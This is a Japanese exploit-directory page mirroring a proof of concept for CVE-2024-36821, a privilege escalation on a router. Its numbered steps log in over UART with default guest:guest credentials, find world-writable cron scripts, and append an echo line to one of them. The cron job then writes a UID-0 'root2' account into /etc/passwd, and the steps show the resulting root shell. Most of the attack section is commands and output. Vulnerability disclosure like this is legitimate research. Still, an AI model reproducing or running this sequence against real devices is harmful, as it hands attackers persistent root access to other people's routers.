Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-36821 — CVE-2024-36821 が対象とする脆弱性の必要最小限の情報を含む公開リファレンス | Kitploit
ツール/GitHubGitHub/ivanglinkin/cve-2024-36821
組み込みシステムセキュリティ特権昇格脆弱性分析エクスプロイトペネトレーションテストハードウェアとIoTセキュリティ
GitHubivanglinkin/cve-2024-36821

CVE-2024-36821

CVE-2024-36821 が対象とする脆弱性の必要最小限の情報を含む公開リファレンス

リポジトリを見る
32年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2024-36821

CVE-2024-36821 で扱われる脆弱性に必要な最小限の情報を含む公開リファレンスです。

PoC のオリジナル動画はこちら -> https://www.youtube.com/watch?v=6vHno0ik7JY

PoC:

  1. UART 接続でルーターに接続する

  2. guest:guest の資格情報を使用してシステムにログインする

  3. find / -perm -777 -type f 2>/dev/null コマンドを使用して、読み取り・書き込み・実行権限を持つファイルを探す:

    root@kitploit:~
    1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
    2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
    3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
    4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
    5. /tmp/cron/cron.everyminute/conntrack_collector.sh
    
    Screenshot 2024-06-10 at 20 00 50
  4. ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh コマンドで所有者を確認する

  5. openssl passwd Abracadabra コマンドでパスワードを生成する

  6. /tmp/cron/cron.everyminute/conntrack_collector.sh を編集し、末尾に生成した新しいパスワードを追加する:

    root@kitploit:~
    echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
    
    Screenshot 2024-06-10 at 20 05 05
  7. 1分待つ

  8. 次のコマンドでユーザーを root2 に切り替える

    root@kitploit:~
    / $ su root2
    Password: Abracadabra
    ~ #
    
ツールをダウンロード